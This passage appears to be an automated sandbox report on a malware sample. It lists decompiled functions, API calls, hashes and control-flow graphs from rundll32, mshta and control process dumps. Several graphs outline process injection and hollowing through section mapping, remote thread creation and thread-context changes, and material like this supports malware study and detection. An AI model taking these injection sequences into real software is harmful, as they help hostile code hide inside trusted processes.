                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                            • Part of subcall function 01007A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,010045FE,00000000,00000001,00000001,?,?,01006973,?,?,?,?,00000102), ref: 01007A65
                            • Part of subcall function 01007A57: StrChrA.SHLWAPI(?,0000003F,?,?,01006973,?,?,?,?,00000102,010037A0,?,?,76CC81D0,00000000), ref: 01007A6F
                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01006973,?,?,?,?,00000102,010037A0,?), ref: 0100462E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0100463E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0100464A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                          • String ID:
                          • API String ID: 3767559652-0
                          • Opcode ID: 7c5655e873c874f126992a3ad5e23610bc15cd8fb54bf4142694933dc5ecea19
                          • Instruction ID: 415af40db6a26d99bcb0e8140c9178013c978ab5439a75055f5e40a7bc8b1928
                          • Opcode Fuzzy Hash: 7c5655e873c874f126992a3ad5e23610bc15cd8fb54bf4142694933dc5ecea19
                          • Instruction Fuzzy Hash: D821D571904256EFEB13AFB8CC44EAF7FF9AF59244F054051FA859B241E635D900C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B75189 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                          • Instruction ID: babf06b712ca6163cc254836957f6b1b935850b3bf9eb5e0eacf8f6483e0d87a
                          • Opcode Fuzzy Hash: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                          • Instruction Fuzzy Hash: 16119E7664191DBFCB209FA0DC84A66B778FF09300F050198F95692850D772F9B19BE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010028C4 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010028C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E01006D63(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                          0x010028d9
                          0x010028dd
                          0x010028e7
                          0x010028ec
                          0x010028f1
                          0x010028f3
                          0x010028fb
                          0x01002900
                          0x0100290e
                          0x01002913
                          0x0100291d

                          APIs
                          • lstrlenW.KERNEL32(004F0053,?,76C85520,00000008,052993F4,?,010021EB,004F0053,052993F4,?,?,?,?,?,?,010066BE), ref: 010028D4
                          • lstrlenW.KERNEL32(010021EB,?,010021EB,004F0053,052993F4,?,?,?,?,?,?,010066BE), ref: 010028DB
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • memcpy.NTDLL(00000000,004F0053,76C869A0,?,?,010021EB,004F0053,052993F4,?,?,?,?,?,?,010066BE), ref: 010028FB
                          • memcpy.NTDLL(76C869A0,010021EB,00000002,00000000,004F0053,76C869A0,?,?,010021EB,004F0053,052993F4), ref: 0100290E
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlenmemcpy$AllocateHeap
                          • String ID:
                          • API String ID: 2411391700-0
                          • Opcode ID: f5211d40b89a93d9115bce4884f9b3270c89be1c22c4cedb35cf1cac9b094b3d
                          • Instruction ID: f09e69679268e534278c0474c3285c3a5f2c1117a6f3c4a33bc8a3e5a2652669
                          • Opcode Fuzzy Hash: f5211d40b89a93d9115bce4884f9b3270c89be1c22c4cedb35cf1cac9b094b3d
                          • Instruction Fuzzy Hash: 01F04F72900119BFDF12EFA9CC84CCE7BACEF08254B018062F904D7101E631EA148BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B78193 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(69B25F44,?,?,00000000,05B75F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 05B781A4
                          • lstrlen.KERNEL32(?,?,?,?), ref: 05B781A9
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 05B781C5
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B781E3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                          • String ID:
                          • API String ID: 1697500751-0
                          • Opcode ID: 34c7c642cea8603f3917b05a4c38ffd0160d57d8ea16818f4fc5a4f98619abb1
                          • Instruction ID: 15b3615a8088ad43f748a1cb20a34b6171ea062a730e5e96fc35edb4c0c2b1cb
                          • Opcode Fuzzy Hash: 34c7c642cea8603f3917b05a4c38ffd0160d57d8ea16818f4fc5a4f98619abb1
                          • Instruction Fuzzy Hash: 68F02DBA504B41BBD73196AA9C4CE2BBF9AFF88211F280491F90983200E631E004CBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B68DC7 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(05FB8560,76C85520,76CC81D0,773BEEF0,05B6E873,?), ref: 05B68DD7
                          • lstrlen.KERNEL32(?), ref: 05B68DDF
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(00000000,05FB8560), ref: 05B68DF3
                          • lstrcat.KERNEL32(00000000,?), ref: 05B68DFE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                          • String ID:
                          • API String ID: 74227042-0
                          • Opcode ID: 2f31ba3320bbdd3ffc1ce6f01697236ae823860a3c0a525393c65997240f9619
                          • Instruction ID: 61969d10790d996406f3512c07fb1e21cc1bc7773bb7cda3115b730413900d31
                          • Opcode Fuzzy Hash: 2f31ba3320bbdd3ffc1ce6f01697236ae823860a3c0a525393c65997240f9619
                          • Instruction Fuzzy Hash: 5DE09233501220AB87219BE4AC4CCAFBFADEF996203040816F600D3100CB25A800CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100393C Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(05299B68,00000000,00000000,00000000,01005902,00000000), ref: 0100394C
                          • lstrlen.KERNEL32(?), ref: 01003954
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • lstrcpy.KERNEL32(00000000,05299B68), ref: 01003968
                          • lstrcat.KERNEL32(00000000,?), ref: 01003973
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                          • String ID:
                          • API String ID: 74227042-0
                          • Opcode ID: 60abbeb27a5d93f86e2ef613325ce10db2493c8fd156d58c354b0857885724a3
                          • Instruction ID: 232959e164427f50954d7e25f00792eec380beee3b3cb3c0976b857c811dc687
                          • Opcode Fuzzy Hash: 60abbeb27a5d93f86e2ef613325ce10db2493c8fd156d58c354b0857885724a3
                          • Instruction Fuzzy Hash: 7AE09273905621AB8723ABE8AC48C9FBBADEF89661F044416F644D3115C76A98018BE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          Function 00000293CD960FB2 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000018.00000003.395255840.00000293CD960000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000293CD960000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_3_293cd960000_mshta.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                          • Instruction ID: c91bda8d321a9a821cd8d4c48e8f2e458cd323f73694db503ac949b9b248c66e
                          • Opcode Fuzzy Hash: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                          • Instruction Fuzzy Hash: DEB0120846FFC24ED70313730CA925D2F60AE47114FC919C79059D50D3E04C068E5322
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00000293CD960FC1 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000018.00000003.395255840.00000293CD960000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000293CD960000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_3_293cd960000_mshta.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                          • Instruction ID: 27aecde98b4e6d41c16ef3b5bb8676dca2f3a5ffa2eaa5aebd85813c69b063d7
                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                          • Instruction Fuzzy Hash: 4B90024859580655D55451A10C8925C50416788150FD44481542AA0184D48D03971252
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          Function 007F9660 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 648COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7f9660-7f96bc 1 7f96be-7f96d1 0->1 2 7f96d3-7f96db 0->2 3 7f96e0-7f96e8 1->3 2->3 4 7f96ea-7f96ed 3->4 5 7f96f2-7f96fa 3->5 6 7f9cfe-7f9d1a 4->6 7 7f973f-7f9749 5->7 8 7f96fc-7f9719 5->8 9 7f974f-7f975f 7->9 10 7f9c7e 7->10 16 7f971b-7f971e 8->16 17 7f9723-7f973d call 8160dc 8->17 9->10 11 7f9765-7f9771 9->11 13 7f9c83-7f9c86 10->13 14 7f9777-7f977f 11->14 15 7f99a4-7f99a8 11->15 18 7f9c88-7f9c92 NtUnmapViewOfSection 13->18 19 7f9c97-7f9c9a 13->19 22 7f99ae-7f99b3 14->22 23 7f9785-7f97c0 call 80583c 14->23 15->22 15->23 24 7f9cd5-7f9cdd 16->24 17->7 18->19 20 7f9c9c-7f9ca7 19->20 21 7f9cd0-7f9cd1 19->21 26 7f9ca9-7f9cab 20->26 27 7f9cb2-7f9cb9 NtClose 20->27 21->24 22->24 35 7f9c77-7f9c7c 23->35 36 7f97c6-7f97fc call 8041d8 23->36 24->6 29 7f9cdf-7f9cf6 call 7fe53c 24->29 26->27 31 7f9cad-7f9cb0 26->31 34 7f9cbe-7f9cc8 27->34 29->6 31->21 34->21 35->13 36->13 40 7f9802-7f9816 call 816c4c 36->40 40->13 43 7f981c-7f981f 40->43 44 7f9821-7f982b call 7fb7b8 43->44 45 7f9830-7f9835 43->45 44->45 47 7f9837-7f983f 45->47 48 7f9862-7f9888 call 7fb7b8 45->48 47->48 49 7f9841-7f9842 47->49 53 7f989b-7f989f 48->53 54 7f988a-7f9898 48->54 51 7f9845-7f9860 49->51 51->48 51->51 55 7f98b8-7f98c5 53->55 56 7f98a1-7f98b5 53->56 54->53 57 7f98cb-7f98f5 55->57 58 7f99b8-7f99bf 55->58 56->55 59 7f990d-7f9930 call 815684 57->59 60 7f98f7-7f98fe 57->60 61 7f99d7-7f99fc 58->61 62 7f99c1-7f99c8 58->62 71 7f9a88-7f9a8a 59->71 72 7f9936-7f995d call 815684 59->72 60->59 63 7f9900-7f9907 60->63 61->71 73 7f9a02-7f9a26 call 7f25c0 61->73 62->61 64 7f99ca-7f99d1 62->64 63->59 66 7f9992-7f999f 63->66 64->61 67 7f9a76-7f9a7a 64->67 70 7f9a80-7f9a83 call 7fb7b8 66->70 67->70 70->71 71->13 77 7f9a90-7f9ad4 call 7fb7b8 71->77 72->71 81 7f9963-7f998a call 815684 72->81 73->71 82 7f9a28-7f9a4c call 7f25c0 73->82 89 7f9c5c-7f9c5e 77->89 90 7f9ada-7f9b1f call 7fe53c * 2 77->90 81->71 91 7f9990 81->91 82->71 92 7f9a4e-7f9a72 call 7f25c0 82->92 89->13 95 7f9c60-7f9c6b 89->95 102 7f9c2b-7f9c32 90->102 103 7f9b25-7f9b52 call 8104cc 90->103 91->66 92->71 100 7f9a74 92->100 95->13 98 7f9c6d-7f9c75 95->98 98->13 100->67 109 7f9c3b 102->109 110 7f9c34-7f9c39 102->110 107 7f9b58-7f9b65 103->107 108 7f9c42-7f9c48 103->108 113 7f9b7d-7f9b7f 107->113 114 7f9b67-7f9b7b 107->114 111 7f9c4a-7f9c54 108->111 112 7f9c3d-7f9c40 109->112 110->111 111->89 112->108 112->111 113->112 115 7f9b85-7f9bda call 7fb7b8 113->115 114->113 120 7f9bdc-7f9be1 115->120 121 7f9be4-7f9c02 call 7f6d24 115->121 120->121 121->111 125 7f9c04-7f9c11 121->125 125->112 126 7f9c13-7f9c1f NtSetContextThread 125->126 127 7f9c27-7f9c29 126->127 127->112
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                          • Instruction ID: a1eaa72b6bdb84c070646fec1a97f5c8bf849ca1c759cafac44ae41e445d6831
                          • Opcode Fuzzy Hash: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                          • Instruction Fuzzy Hash: F3127330618E4D8FDB69EF28D895A7673E1FB98301F50452EE64AC3251EF38E945CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007F65E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 128 7f65e4-7f6653 call 7fe53c 132 7f672c-7f6735 128->132 133 7f6659-7f6674 128->133 135 7f671e-7f671f 133->135 136 7f667a-7f66bb NtQueryInformationToken 133->136 135->132 138 7f66bd-7f66e8 NtQueryInformationToken 136->138 139 7f6710-7f6718 NtClose 136->139 140 7f66fe-7f6708 138->140 141 7f66ea-7f66f9 call 7fb7b8 138->141 139->135 140->139 141->140
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: InformationQueryToken$Close
                          • String ID: 0
                          • API String ID: 459398573-4108050209
                          • Opcode ID: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                          • Instruction ID: 12a1b93eae9d5889d9042574a5aa5d1b128001821425078424c2de6f7e1ce914
                          • Opcode Fuzzy Hash: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                          • Instruction Fuzzy Hash: 0E311E312187488FD764EF19D8C87AAB7E5FBD9311F50492EE58EC3250DB349945CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007FAA6C Relevance: 6.2, APIs: 4, Instructions: 187nativethreadinjectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 188 7faa6c-7faaa4 189 7faac8-7faad4 call 7f495c 188->189 190 7faaa6-7faab9 188->190 194 7faada-7faaea 189->194 195 7fac25 189->195 190->189 196 7faabb-7faac3 190->196 197 7fab3f-7fab5c 194->197 198 7faaec-7fab1c NtSetInformationProcess 194->198 199 7fac2a-7fac2d 195->199 204 7fac3a-7fac54 196->204 207 7fab5e-7fab60 197->207 201 7fab1e-7fab2e call 816e10 198->201 202 7fab30-7fab38 198->202 203 7fac2f-7fac30 199->203 199->204 211 7fab3a-7fab3d 201->211 202->211 203->204 207->199 210 7fab66-7fab85 207->210 213 7fac1e-7fac23 210->213 214 7fab8b-7fab8e 210->214 211->197 211->207 213->199 214->213 215 7fab94-7fabc4 CreateRemoteThread 214->215 216 7fabc6-7fabcd 215->216 217 7fac14-7fac1c 215->217 218 7fabcf-7fabd4 call 8171e8 216->218 219 7fabd9-7fabf5 call 7feca8 216->219 217->199 218->219 224 7fabf7-7fabff 219->224 225 7fac01 ResumeThread 219->225 226 7fac07-7fac12 FindCloseChangeNotification 224->226 225->226 226->199
                          APIs
                          • NtSetInformationProcess.NTDLL ref: 007FAB14
                          • CreateRemoteThread.KERNELBASE ref: 007FABBA
                          • FindCloseChangeNotification.KERNELBASE ref: 007FAC0C
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
                          • String ID:
                          • API String ID: 1964589409-0
                          • Opcode ID: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                          • Instruction ID: 1ee13dd08e825e05a0925573d1c95303e9a198dabefdd0a3aa132fcb0b1eeb5a
                          • Opcode Fuzzy Hash: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                          • Instruction Fuzzy Hash: 0351AF71618F098FE764EF28D89967677E1FB98311F10452DEA4AC3361EA38DC41C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007FEEF8 Relevance: 4.1, APIs: 2, Instructions: 1069synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 321 7feef8-7fef77 324 7fefad-7fefae 321->324 325 7fef79-7fefab call 7fe53c 321->325 327 7fefb0-7fefb3 324->327 325->327 329 7fefb9-7fefe2 CreateMutexExA 327->329 330 7ffb22-7ffb3e 327->330 333 7fefe4-7fefe9 329->333 334 7ff000-7ff003 329->334 335 7feffd-7feffe 333->335 336 7fefeb-7feff8 333->336 337 7ffb1f-7ffb20 334->337 338 7ff009-7ff030 334->338 335->334 336->337 337->330 341 7ff0f7-7ff0f8 338->341 342 7ff036-7ff082 338->342 343 7ff0fa-7ff0fd 341->343 355 7ff099-7ff0a9 342->355 356 7ff084-7ff08b 342->356 343->330 344 7ff103-7ff144 343->344 348 7ff14a-7ff150 344->348 349 7ff1e8-7ff1e9 344->349 351 7ff1be-7ff1e6 call 803bc8 348->351 352 7ff152-7ff160 348->352 350 7ff1eb-7ff1ee 349->350 350->330 358 7ff1f4-7ff20f GetUserNameA 350->358 351->350 354 7ff162-7ff1aa 352->354 359 7ff1ac-7ff1b0 354->359 360 7ff1b6-7ff1bc 354->360 362 7ff0af-7ff0d8 355->362 356->355 361 7ff08d-7ff093 call 81b2cc 356->361 364 7ff211-7ff22d 358->364 365 7ff240-7ff252 358->365 359->360 360->351 360->354 361->355 374 7ff0da-7ff0f5 362->374 364->365 375 7ff22f-7ff238 364->375 367 7ff25b-7ff2a4 365->367 368 7ff254-7ff259 365->368 383 7ff2b7-7ff2b8 367->383 384 7ff2a6-7ff2af 367->384 368->367 369 7ff2c6-7ff2cb 368->369 376 7ff30d-7ff310 369->376 377 7ff2cd-7ff2ee 369->377 374->343 375->365 378 7ff327-7ff35e 376->378 379 7ff312-7ff322 call 7fb7b8 376->379 389 7ff302-7ff30a 377->389 390 7ff2f0-7ff2f7 377->390 387 7ff3c1 378->387 388 7ff360-7ff380 378->388 379->378 393 7ff2c0 383->393 396 7ff2b5 384->396 397 7ff3e4-7ff3f0 384->397 391 7ff3c6-7ff3c9 387->391 403 7ff386-7ff3a4 call 7fccc8 388->403 389->376 390->389 394 7ff2f9-7ff300 390->394 391->330 395 7ff3cf-7ff3d2 391->395 393->369 394->376 399 7ff3db-7ff3de 395->399 400 7ff3d4 call 80b4b0 395->400 396->393 401 7ff46a-7ff47c call 819604 397->401 402 7ff3f2-7ff423 call 81ba3c 397->402 399->330 399->397 410 7ff3d9 400->410 415 7ff47e-7ff4af call 81ba3c 401->415 416 7ff4b6-7ff4c8 call 8198a8 401->416 402->401 412 7ff425-7ff42d 402->412 413 7ff3a6-7ff3af 403->413 414 7ff3b3 403->414 410->399 412->401 417 7ff42f-7ff464 call 80ef6c 412->417 413->403 418 7ff3b1 413->418 419 7ff3b8-7ff3bf 414->419 425 7ff4b1-7ff4b2 415->425 426 7ff4d0-7ff517 call 80d43c call 80ac88 415->426 416->426 417->401 418->419 419->391 425->416 433 7ff519-7ff538 426->433 434 7ff540-7ff543 call 81b4d0 426->434 433->434 437 7ff548-7ff54d 434->437 437->330 438 7ff553-7ff56c 437->438 438->330 440 7ff572-7ff59a 438->440 442 7ff59c-7ff5b1 440->442 443 7ff5c0-7ff5ea call 8126bc 440->443 442->443 447 7ff5b3-7ff5bb 442->447 448 7ff5ec-7ff5f4 443->448 449 7ff5f9-7ff608 443->449 447->330 448->330 450 7ff60e-7ff644 call 803bc8 449->450 451 7ff8d1-7ff8d8 449->451 468 7ff646-7ff64d 450->468 469 7ff651-7ff654 450->469 453 7ff8de-7ff902 call 817004 451->453 454 7ffa60-7ffa69 451->454 466 7ff908-7ff928 call 818678 453->466 467 7ff9a5-7ff9c6 call 817004 453->467 454->337 457 7ffa6f-7ffa74 454->457 460 7ffae6-7ffb14 call 8126bc 457->460 461 7ffa76-7ffa79 457->461 460->448 476 7ffb1a-7ffb1c 460->476 462 7ffa8b-7ffaa8 461->462 463 7ffa7b-7ffa85 461->463 462->460 480 7ffaaa-7ffadc 462->480 463->462 466->467 482 7ff92a-7ff937 466->482 467->454 481 7ff9cc-7ff9e9 call 818678 467->481 468->469 469->330 474 7ff65a-7ff727 call 816b44 * 4 469->474 506 7ff729-7ff730 474->506 507 7ff795-7ff798 474->507 476->337 480->460 481->454 489 7ff9eb-7ff9f8 481->489 483 7ff939-7ff97e call 810c58 call 8148d4 482->483 484 7ff993-7ff99d 482->484 483->484 505 7ff980-7ff98e call 80f5d8 483->505 484->467 492 7ffa4e-7ffa58 489->492 493 7ff9fa-7ffa40 call 810c58 call 8148d4 489->493 492->454 493->492 516 7ffa42-7ffa49 call 80b24c 493->516 505->484 506->507 511 7ff732-7ff74d 506->511 507->330 510 7ff79e-7ff7a5 507->510 513 7ff7bc-7ff7db 510->513 514 7ff7a7-7ff7b6 510->514 518 7ff74f-7ff755 511->518 519 7ff757-7ff783 call 8126bc 511->519 521 7ff7dd-7ff816 call 7ffe20 513->521 522 7ff81b-7ff85b 513->522 514->513 516->492 527 7ff793 518->527 519->507 529 7ff785-7ff78b 519->529 521->522 530 7ff89e-7ff8a4 522->530 531 7ff85d-7ff87a call 8126bc 522->531 527->507 529->527 536 7ff8a6-7ff8a9 530->536 537 7ff87c-7ff881 531->537 538 7ff883-7ff89c 531->538 536->330 539 7ff8af-7ff8ba 536->539 537->536 538->536 539->454 540 7ff8c0-7ff8cc call 7f6274 539->540 540->454
                          APIs
                          • CreateMutexExA.KERNEL32 ref: 007FEFC5
                          • GetUserNameA.ADVAPI32 ref: 007FF1FE
                            • Part of subcall function 008126BC: CreateThread.KERNELBASE ref: 008126EC
                            • Part of subcall function 008126BC: QueueUserAPC.KERNELBASE ref: 00812703
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateUser$MutexNameQueueThread
                          • String ID:
                          • API String ID: 2503873790-0
                          • Opcode ID: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                          • Instruction ID: 20fc3d343d1da8205a177cbc89913b3cf2f653d474580bdf71e2141fea2ddfd6
                          • Opcode Fuzzy Hash: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                          • Instruction Fuzzy Hash: 2A729275619A0C8FE778EF28EC8556973E5FB58700B20852ED54BC3261DE38E947CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0080583C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 597 80583c-80587e 599 805884-8058c7 597->599 600 805a4f 597->600 604 805a3b-805a4d 599->604 605 8058cd-8058ec 599->605 601 805a54-805a77 600->601 604->601 605->604 608 8058f2-805911 605->608 608->604 610 805917-805936 608->610 610->604 612 80593c-80595b 610->612 612->604 614 805961-8059e3 call 7fe53c NtCreateSection 612->614 617 8059e5-805a02 call 8041d8 614->617 618 805a2a-805a2f 614->618 623 805a20-805a28 617->623 624 805a04-805a1e call 7fe53c 617->624 622 805a31-805a33 618->622 622->604 625 805a35-805a39 622->625 623->622 624->622 625->601
                          APIs
                          • NtCreateSection.NTDLL ref: 008059DE
                            • Part of subcall function 008041D8: NtMapViewOfSection.NTDLL ref: 00804224
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: Section$CreateView
                          • String ID: 0
                          • API String ID: 1585966358-4108050209
                          • Opcode ID: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                          • Instruction ID: 01b22afbdf01197ed4346743cf7bd75f09731b8f6da1a5dd4d2f950640af79fd
                          • Opcode Fuzzy Hash: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                          • Instruction Fuzzy Hash: CF61B070218F098FDB54EF28D8C9A6677E1FB98305F10466EE84AC7261EB34D941CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008104CC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
